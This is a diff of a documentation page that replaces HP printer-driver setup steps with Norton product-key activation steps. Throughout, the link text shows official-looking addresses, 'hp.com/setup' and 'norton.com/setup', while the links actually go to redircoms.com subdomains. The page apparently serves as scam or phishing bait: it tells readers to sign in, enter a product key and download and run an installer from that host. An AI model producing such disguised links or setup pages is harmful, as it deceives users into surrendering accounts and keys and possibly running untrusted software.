hp-printerr/norlive/index.rst

-There are 5 simple stages to download, install, and set up your HP printer driver on your computer.
-Follow each stage one by one to successfully connect your printer via `hp.com/setup <https://hp.redircoms.com>`_.
-HP’s setup site provides the latest drivers and simple installation steps.
-It’s the fastest way to ensure your printer works seamlessly with your computer.
-Visit `hp.com/setup <https://hp.redircoms.com>`_, download the right driver, and get your printer ready to use in minutes.
+There are 5 simple stages to enter your Norton product key and activate your subscription at `norton.com/setup <https://nt.redircoms.com>`_.
+Norton’s setup site makes activation easy and secure.
+It’s the fastest way to ensure your device is protected with the latest security features.
+Visit `norton.com/setup <https://nt.redircoms.com>`_, enter your product key, and get started in minutes.

 **********
-Steps to Download HP Printer Driver
+Steps to Enter Norton Product Key
 **********

-1. Open a web browser and go to `hp.com/setup <https://hp.redircoms.com>`_.
+1. Open a web browser and go to `norton.com/setup <https://nt.redircoms.com>`_.

-2. Enter your HP printer model in the search box.
+2. Sign in to your Norton account.
+If you don’t have one, create a new account.

-3. Select your operating system if prompted.
+3. Locate your 25-character Norton product key.

-4. Click on **Download** to get the latest driver and software package.
+4. Enter the product key in the field provided.

-5. Save the installer file to your computer.
+5. Click **Submit** to redeem and activate your subscription.

 **********
-Steps to Install HP Printer Driver
+Steps to Download Norton Setup
 **********

-1. Locate the downloaded installer file on your computer.
+1. After entering your product key, you’ll see a **Download** option.

-2. Double-click the installer to begin the setup process.
+2. Click **Download** to get the Norton installer.

-3. Follow the on-screen instructions and accept the license agreement.
+3. Save the installer file to your computer.

-4. Choose your connection type (USB or Wireless).
+4. Double-click the installer to start the installation process.

-5. Complete the installation by clicking **Finish**.
+5. Follow on-screen instructions to complete setup.

 **********
-Setting Up Your HP Printer
+Activating Norton on Your Device
 **********

-1. Make sure your HP printer is powered on.
+1. Make sure your device meets the system requirements.

-2. For wireless setup, ensure your printer and computer are on the same Wi-Fi network.
+2. Launch the Norton software you installed.

-3. Open the HP driver or utility you installed.
+3. Sign in with your Norton account if prompted.

-4. Follow on-screen prompts to detect and connect your printer.
+4. The software will automatically verify your subscription.

-5. Once connected, print a test page to verify setup is complete.
+5. Once activated, run a **Quick Scan** to confirm protection is enabled.